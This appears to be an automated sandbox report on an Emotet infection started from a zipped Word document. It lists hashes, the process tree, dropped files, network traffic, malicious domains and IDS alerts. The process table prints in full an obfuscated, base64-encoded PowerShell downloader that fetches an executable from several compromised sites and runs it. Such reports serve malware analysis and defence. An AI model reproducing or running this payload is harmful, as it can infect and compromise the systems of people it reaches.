File name: | malware.malware.zip |
Full analysis: | https://app.any.run/tasks/a6fcac8a-8a8a-481b-83dc-044e7f2de39f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 19, 2020, 20:35:00 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | B7AEC79C3210628FB3C3119345B7F1E5 |
SHA1: | 2AFB0758FBF42C344F1F6F92BDE4188C1D16B6F8 |
SHA256: | 500D686F7C6DCEB293446ACE4B18A927DF0393E6270DDD6A1DDEA012C350CD53 |
SSDEEP: | 1536:xtM0COi0t3BhTFQZIdBH5LQJuzCJ061BMKSJpDHX5rJpSSK8:xtFFlt3iK5Ly0iBM/TDHX5XSSK8 |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | None |
ZipModifyDate: | 2020:10:16 05:44:15 |
ZipCRC: | 0xaa7ea0c4 |
ZipCompressedSize: | 68469 |
ZipUncompressedSize: | 68469 |
ZipFileName: | malware.malware |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2488 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\malware.malware.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2876 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\malware.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
884 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\malware.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Document du 16_10.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1092 | POwersheLL -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQAQQB3AF8AMgA3AGYAbwA7ACQARwBuAGcAbgAwADQAcAA9ACgAJwBGACcAKwAoACcAMgBxACcAKwAnAGoAJwApACsAKAAnADYAJwArACcAdgBfACcAKQApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAYwBgAFIAZQBhAFQARQBgAGQAaQByAGAARQBDAHQAbwByAHkAIgAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcAewAwAH0AQwAnACsAKAAnAHUAMwBkACcAKwAnAHAAdgAnACkAKwAnAGIAJwArACcAewAnACsAJwAwAH0ARAA3ADQAYQA4AHEAJwArACcAdQB7ADAAfQAnACkAIAAtAGYAWwBjAGgAYQBSAF0AOQAyACkAKQA7ACQARwAxAGkANAAxADYAcwA9ACgAKAAnAEwANQAzACcAKwAnADMAJwApACsAJwBiACcAKwAnAHcAZwAnACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAGAAQwB1AHIAaQBgAFQAYAB5AFAAcgBPAFQAYABvAEMAYABPAGwAIgAgAD0AIAAoACgAJwBTACcAKwAnAHMAbAAnACkAKwAoACcAMwAsAFQAJwArACcAbABzACwAJwApACsAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMQAnACkAKwAnACwAJwArACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAFUAOABoAHkAaQBpAGUAPQAoACcAUgAnACsAKAAnAHkAcwAnACsAJwB5AHUAJwApACsAJwB6ADUAJwApADsAJABHAGMAeABlAHcAeQBmACAAPQAgACgAJwBRAGwAJwArACgAJwByAGYAOQAnACsAJwB2ACcAKQArACcAZQAnACkAOwAkAFcAawA5AGUAYQB5AGEAPQAoACgAJwBPADAAcgA5ACcAKwAnAG4AJwApACsAJwBtACcAKwAnAHEAJwApADsAJABQAGkAZABiAG0ANgBtAD0AKAAnAFoAJwArACgAJwBsACcAKwAnAGYAMgAnACkAKwAoACcAZQBhACcAKwAnAHUAJwApACkAOwAkAE4AbwA3ADUAawBnAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACgAJwBDAHUAMwBkACcAKwAnAHAAJwApACsAJwB2AGIAJwArACcAewAwAH0ARAA3ACcAKwAoACcANAAnACsAJwBhADgAcQAnACkAKwAnAHUAewAwAH0AJwApAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABHAGMAeABlAHcAeQBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVQA0ADMAMABsAF8AXwA9ACgAKAAnAFIANwBkAHcAaAAnACsAJwA3ACcAKQArACcAZAAnACkAOwAkAEkAeABqAG0AcAAzAGoAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AdwBlAEIAQwBsAEkARQBuAFQAOwAkAEIAXwAyADMANwBhAGYAPQAoACgAJwBoAHQAdABwADoAJwArACcALwAnACkAKwAoACcALwBqACcAKwAnAGEAcwBoACcAKQArACgAJwBtAHUAcwBpAGMALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKwAnAHcAcAAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvACcAKwAnAHUAZQBUACcAKQArACgAJwBtAGUAeAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGMAbwBuAHMAdQBsACcAKwAnAHQAJwArACcAbQB5AGEAZAB2AG8AJwArACcALgBjAG8AJwApACsAKAAnAG0AJwArACcALwBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACcAZQBuACcAKwAoACcAdAAvAEoAcgAnACsAJwA2ACcAKQArACgAJwAvACoAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwB0AGgAJwArACcAZQAnACkAKwAoACcAZAAnACsAJwBpAGIAYgBzACcAKwAnAGEAcABwACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGIAYQBjAGsAdQAnACsAJwBwAC0AMQA0AC0AMQAwACcAKwAnAC0AMgAwADIAJwArACcAMAAnACkAKwAnAC8AJwArACcAeQBCACcAKwAoACcAVgAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAnADoALwAnACsAJwAvAGMAJwArACgAJwBlAHMAdQAnACsAJwByAGwAYQAnACkAKwAoACcAcgBzAGUAYQByAGEAeQAuAGMAbwAnACsAJwBtAC8AJwArACcAdwBwAC0AJwArACcAYQAnACkAKwAnAGQAJwArACgAJwBtACcAKwAnAGkAJwArACcAbgAvAFIAdQBNACcAKQArACgAJwBwAGQAJwArACcATgAnACkAKwAnAEQAJwArACgAJwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwBtACcAKwAnAGUAdAAnACsAJwBoAGkAbAAnACkAKwAoACcAaQBuACcAKwAnAGYAbwB0ACcAKwAnAGUAYwBoAC4AJwArACcAYwAnACsAJwBvAG0ALwAnACsAJwBtAGEAbAAnACkAKwAnAGkAZwAnACsAJwBhACcAKwAoACcALwAnACsAJwBPAEYAYgAnACkAKwAnAHIALwAnACsAJwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAJwAvAC8AYQBuAHQAaABvACcAKwAnAG4AJwArACcAeQBzAGEAJwArACcAcgBhAG4AZAByAGUAJwApACsAKAAnAGEALgAnACsAJwBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAnAC8AJwArACgAJwBHACcAKwAnAGUALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKQArACgAJwB1ACcAKwAnAHAAJwArACcAYwBsACcAKwAnAG8AdQBkAHcAZQBiAC4AJwApACsAJwBjAG8AJwArACgAJwBtAC8AYwBvACcAKwAnAG4AdABlAG4AdAAvACcAKwAnAEcAVgAnACkAKwAoACcASQAnACsAJwA3AC8AJwApACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFcAcQB1AHoAcgBjAGMAIAArACAAJABHADUAagBkADIAcgB3ACAAKwAgACQAWQBnAGYAMQB0AGoAcwApADsAJABLAGsAZgB2AHUAcwAxAD0AKAAnAEcAYwAnACsAKAAnAG8AcgAnACsAJwAyADIAdAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwA0AHEAXwBrAGwAdAAgAGkAbgAgACQAQgBfADIAMwA3AGEAZgApAHsAdAByAHkAewAkAEkAeABqAG0AcAAzAGoALgAiAGQAbwBXAE4AYABMAGAAbwBgAEEAZABmAEkATABlACIAKAAkAFMANABxAF8AawBsAHQALAAgACQATgBvADcANQBrAGcAZAApADsAJABGADYANwB5AHEANgAxAD0AKAAnAFMAMgAnACsAJwBhACcAKwAoACcAZQA2AGoAJwArACcAdAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABOAG8ANwA1AGsAZwBkACkALgAiAGwAZQBuAEcAYABUAGgAIgAgAC0AZwBlACAAMgA4ADkAOAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACgAJwAzADIAJwArACcAXwBQAHIAJwArACcAbwBjACcAKQArACgAJwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBDAFIAZQBhAGAAVABlACIAKAAkAE4AbwA3ADUAawBnAGQAKQA7ACQATwBoADkAMgBzADEAbgA9ACgAJwBZACcAKwAoACcAcQBwACcAKwAnAHoAJwArACcAdwBrAGgAJwApACkAOwBiAHIAZQBhAGsAOwAkAEIAcgB5AG8ANQBlAHQAPQAoACcASwA2ACcAKwAnADUAcwAnACsAKAAnAHYAMwAnACsAJwBfACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAaAB1AHcAbgAxAD0AKAAoACcATgAnACsAJwA5AHMAcAAnACkAKwAnAGsAYgAnACsAJwBlACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2168 | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1840 | "C:\Users\admin\AppData\Local\xpsservices\NlsData001d.exe" | C:\Users\admin\AppData\Local\xpsservices\NlsData001d.exe | Qlrf9ve.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2488 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2488.5155\malware.malware | — | |
MD5:— | SHA256:— | |||
2876 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2876.9077\Document du 16_10.doc | — | |
MD5:— | SHA256:— | |||
3848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2FE9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1092 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKJKY2UQSR0OD435PLEL.temp | — | |
MD5:— | SHA256:— | |||
1092 | POwersheLL.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | — | |
MD5:— | SHA256:— | |||
3848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:5B5FF8871696AEC05FFD45A75EAB77CE | SHA256:BF04F083BA2B143A2F2CAF957151B92DFB3E757C6F6198EA3602E36261F4DA4A | |||
1092 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:D6EE8C34E4C28999F00E385C8808E7DE | SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB | |||
3848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:BF1BA47B7E7C5DB17A6DBC628D5996E6 | SHA256:3799536744EE10B46B88856D8CB00EA9B34E22A2D31DF35DC71298A2D19B982E | |||
3848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:23C6E8A7BBBB9448FBB6F4705DAE43AC | SHA256:444B35821BFA3631C7365B1BB501B9C1C829F48B650D33F88F3263F067AD43F3 | |||
2168 | Qlrf9ve.exe | C:\Users\admin\AppData\Local\xpsservices\NlsData001d.exe | executable | |
MD5:9F1E91C3FAF940E244B27E2E06DAC739 | SHA256:64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1092 | POwersheLL.exe | GET | 302 | 160.153.138.219:80 | http://www.consultmyadvo.com/content/Jr6/ | US | html | 265 b | malicious |
1092 | POwersheLL.exe | GET | — | 72.167.191.65:80 | http://p3nlhclust404.shr.prod.phx3.secureserver.net/SharedContent/redirect_0.html | US | — | — | unknown |
1092 | POwersheLL.exe | GET | 302 | 43.255.154.57:80 | http://jashmusic.com/wp-includes/ueTmex/ | SG | html | 230 b | malicious |
1092 | POwersheLL.exe | GET | 200 | 43.255.154.57:80 | http://jashmusic.com/cgi-sys/suspendedpage.cgi | SG | html | 7.44 Kb | malicious |
1840 | NlsData001d.exe | POST | 200 | 208.180.207.205:80 | http://208.180.207.205/2QL4RyfP2cr/v29oLHgNR/is2t8kWOoK4gxcHw1a/cNs2cliyYEmql/GGlxi/JDWHyNDecddXoRxHX/ | US | binary | 132 b | malicious |
1092 | POwersheLL.exe | GET | 200 | 69.65.3.197:80 | http://methilinfotech.com/maliga/OFbr/ | US | executable | 361 Kb | suspicious |
1092 | POwersheLL.exe | GET | 404 | 173.212.251.233:80 | http://cesurlarsearay.com/wp-admin/RuMpdND/ | DE | html | 315 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1092 | POwersheLL.exe | 72.167.191.65:80 | p3nlhclust404.shr.prod.phx3.secureserver.net | GoDaddy.com, LLC | US | unknown |
1092 | POwersheLL.exe | 43.255.154.57:80 | jashmusic.com | GoDaddy.com, LLC | SG | malicious |
1092 | POwersheLL.exe | 107.180.51.103:80 | thedibbsapp.com | GoDaddy.com, LLC | US | malicious |
1092 | POwersheLL.exe | 160.153.138.219:80 | www.consultmyadvo.com | GoDaddy.com, LLC | US | malicious |
1092 | POwersheLL.exe | 69.65.3.197:80 | methilinfotech.com | GigeNET | US | suspicious |
1092 | POwersheLL.exe | 173.212.251.233:80 | cesurlarsearay.com | Contabo GmbH | DE | unknown |
1840 | NlsData001d.exe | 208.180.207.205:80 | — | Suddenlink Communications | US | malicious |
Domain | IP | Reputation |
---|---|---|
jashmusic.com |
| malicious |
www.consultmyadvo.com |
| malicious |
p3nlhclust404.shr.prod.phx3.secureserver.net |
| unknown |
thedibbsapp.com |
| unknown |
cesurlarsearay.com |
| unknown |
methilinfotech.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1092 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
1092 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1092 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1092 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1840 | NlsData001d.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |